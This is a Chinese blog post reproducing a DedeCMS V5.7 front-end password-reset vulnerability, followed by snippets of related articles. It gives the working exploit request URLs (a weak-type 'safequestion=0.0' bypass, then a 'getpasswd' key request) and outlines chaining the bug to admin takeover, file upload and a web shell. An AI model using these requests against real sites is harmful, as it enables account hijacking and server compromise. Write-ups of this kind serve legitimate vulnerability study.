DedeCMS-V5.7前台任意用户密码重置

最新推荐文章于 2023-05-05 21:26:54 发布
最新推荐文章于 2023-05-05 21:26:54 发布
阅读量674 收藏 1
点赞数 1
文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43071873/article/details/109311019
版权

DedeCMS-V5.7前台任意用户密码重置

1 漏洞影响
该漏洞允许攻击者修改任意前台用户密码。

2 漏洞利用条件
1,开启会员模块
2,攻击者拥有一个正常的会员账号
3,目标没有设置安全问题

  1. 漏洞复现:
    注册两个账号
    1.0000001 作为攻击账号 id=2
    在这里插入图片描述

2.test 作为目标账号 id=3
在这里插入图片描述

/uploads/member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id=3
在这里插入图片描述

拿到key
/uploads/member/resetpassword.php?dopost=getpasswd&id=3&key= HTnYSD5W
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

按照其他博主的博客,应该是可以实现修改admin用户的密码的,但可能是我的靶机搭的有问题,所以就没有继续进行admin用户密码的修改,结合前台用户密码修改是可以实现对后台密码修改的,这样就拿到了后台权限,结合后台的文件上传也就可以拿下shell了

Lin冲啊
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DeDeCMS前台任意用户密码修改漏洞复现.pdf
12-16
在本文档中,我们关注的是一个特定的安全漏洞,即DeDeCMS前台任意用户密码修改漏洞,该漏洞允许攻击者在满足特定条件的情况下,无需知道用户的安全问题就能重置任意用户密码。 该漏洞首先被Seebug漏洞平台收录,...
DedeCMS 5.5靶机
zhangpeng999123的博客
04-26 718
实验内容 步骤一:信息收集 我们打开终端,输入firefox打开浏览器,访问网址就可以找到版本信息,在首页顶部和底部看到版本信息。 192.168.0.2 访问http://192.168.0.2/robots.txt也可以看见一些信息 这个时候,我们就可以去网络上搜索一些dedecms v5.5版本的漏洞。dedecms v5.5版本存在一个任意文件上传,得到shell的...
渗透实战:dedeCMS任意用户密码重置到内网getshell
niobi的博客
05-05 2096
DedeCMS是一款国产的开源CMS系统,具有使用简单、功能强大、可扩展性好等特点。然而,像其他CMS系统一样,DedeCMS也存在一些安全问题,其中任意密码重置漏洞是其中一个比较严重的漏洞。通过信息泄露,攻击者可以获取到网站的用户用户名和一些敏感信息,然后通过利用任意密码重置漏洞,在不知道原密码的情况下,重置管理员账号的密码,从而获取管理员权限。接着,攻击者可以通过后台getshell,获取网站的控制权,进而进行各种恶意操作,如上传恶意文件、篡改网站内容、窃取用户信息等。
DeDeCMS 前台任意用户密码修改
m0_56368726的博客
12-15 551
1、复现环境 PHP 5.6 DeDeCMSV5.7SP2 正式版(2018-01-09) 使用PHPstudy来搭建网站 下载DeDeCMSV5.7SP2后放在该目录下 开启会员模式设置 注册账号(不要设置安全问题) 2、漏洞复现
内网靶场_从自做到拿下-攻击篇
l805142479的博客
03-14 4988
内网靶场学习,从自己制作靶场到拿下靶场;从frp的隧道搭建,到cs利用frp的反向上线;
内网靶场_从自做到拿下-自做篇
l805142479的博客
03-14 5939
内网靶场学习,从自己制作靶场到拿下靶场;从frp的隧道搭建,到cs利用frp的反向上线;
php东莞蒂凡品牌设计模板DEDECMS核心 v5.7.zip
11-19
总的来说,"php东莞蒂凡品牌设计模板DEDECMS核心 v5.7.zip" 是一个专门为品牌设计公司定制的网站模板,利用PHP和DEDECMS系统,结合高质量的前端代码,为用户提供了一个高效、美观的在线展示平台。通过正确安装和使用...
基于PHP的东莞蒂凡品牌设计模板DEDECMS核心 v5.7.zip
07-25
【标题】"基于PHP的东莞蒂凡品牌设计模板DEDECMS核心 v5.7.zip" 指的是一款专门用于品牌设计的网站模板,该模板是建立在PHP编程语言基础上,利用DEDECMS(织梦内容管理系统)的核心功能构建的。DEDECMS是一款流行的...
基于PHP的东莞蒂凡品牌设计模板DEDECMS核心v5.7源码.zip
最新发布
10-10
【标题】"基于PHP的东莞蒂凡品牌设计模板DEDECMS核心v5.7源码.zip" 提供的是一款基于PHP编程语言的网站模板,它主要用于品牌设计领域,利用了DEDECMS(织梦内容管理系统)的核心框架。DEDECMS是一款广泛应用于中小型...
DeDecms(织梦CMS)最新版任意用户密码重置漏洞分析
热门推荐
3569
01-11 1万+
http://docs.ioin.in/writeup/xianzhi.aliyun.com/_forum_topic_1926/index.html DeDecms(织梦CMS) V5.7.72 正式版20180109 (最新版) 由于前台resetpassword.php中对接受的safeanswer参数类型比较不够严格,遭受弱类型比较攻击 导致了远程攻击者可以在前台会员中心绕过
DeDecms任意用户登录,管理员密码重置漏洞
鸥鹭忘机
07-28 3825
基本信息 漏洞编号:SSV-97087 实验版本:dedecms v5.7SP2 下载地址:http://updatenew.dedecms.com/base-v57/package/DedeCMS-V5.7-UTF8-SP2.tar.gz 参考文章:https://www.seebug.org/vuldb/ssvid-97074 前置知识 如果要把一个key存储到cookie中,织梦的存储方式是把key和加密key同时存储在cookie中。每次读取用户传来的key时,将key进行加密后与传来的加密k
dedecms 漏洞_DedeCMS任意用户密码重置漏洞
weixin_39636540的博客
11-29 867
漏洞环境Fofa搜dedecms漏洞危害重置系统的所有账号的密码影响范围DeDecms V5.7 SP2最新版本漏洞复现首先注册账号0000001/0000002登录成功通过登录抓包知道此账号对应的id号为16然后清除cookie退出浏览器,再次访问登录页面构造请求包生成poc/member/resetpassword.php?dopost=safequestion&safequ...
dedecms5.7 sp2前台修改任意用户密码漏洞(复现)
一个安全研究员
07-10 8267
如题
DedeCMS v5.7 SP2_任意修改前台用户密码
Fly_鹏程万里
06-07 919
影响范围 DedeCMS v5.7 SP2 漏洞危害 任意修改前台用户密码 攻击类型 任意修改前台用户密码 利用条件 1、开启会员模块 2、攻击者拥有一个正常的会员账号 3、目标没有设置安全问题 漏洞简介 DedeCMS v5.7 SP2存在任意修改前台用户密码。 漏洞分析 漏洞文件:/member/resetpasswordd.php 漏洞分析:下面我们一步一步对整个密码重置的过程进行分析 在resetpasswordd.php文件的开头处首先包含进行了一些配置文件以及功能函..
dede 5.7 任意用户重置密码前台
weixin_33842304的博客
01-14 152
返回了重置的链接,还要把&amp删除了,就可以重置密码了 结果只能改test的密码,进去过后,这个居然是admin的密码,有点头大,感觉这样就没有意思了 我是直接上传的一句话,用菜刀连才有乐趣 OK了交key url:http://219.153.49.228:44939/member/resetpassword.php post payload:dopost=s...
DeDeCMS v5.7 SP2 正式版 前台任意用户密码修改漏洞复现
qq_52197074的博客
11-06 395
文章目录简介漏洞限制影响版本复现环境工具准备一、搭建网站二、复现过程 简介 织梦内容管理系统(DedeCms) [1] 以简单、实用、开源而闻名,是国内 最知名的 PHP 开源网站管理系统,也是使用用户最多的 PHP 类 CMS 系统, 在经历多年的发展,目前的版本无论在功能,还是在易用性方面,都有了长 足的发展和进步,DedeCms 免费版的主要目标用户锁定在个人站长,功能 更专注于个人网站或中小型门户的构建,当然也不乏有企业用户和学校等在 使用该系统。 漏洞限制 1、 只影响前台账户 2、 只能修..
dedecms 5.7 密码修改
weixin_30607659的博客
07-18 282
取名放在根目录下面,执行更改密码 。适用于5.7 utf_8 <?php/**********************DedeCMS 管理员帐号重设工具.资源来自:烈火下载 http://down.liehuo.net***********************///error_reporting(E_ALL || ~E_NOTICE);require_once(dirna...
dedecms-v5.7-utf8-sp2
07-30
同时,dedecms-v5.7-utf8-sp2还提供了一系列的用户权限和安全策略,如登录验证、密码加密等,以保护用户数据和网站安全。 总之,dedecms-v5.7-utf8-sp2是一个功能强大、易于使用和安全可靠的开源CMS系统,适用于中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值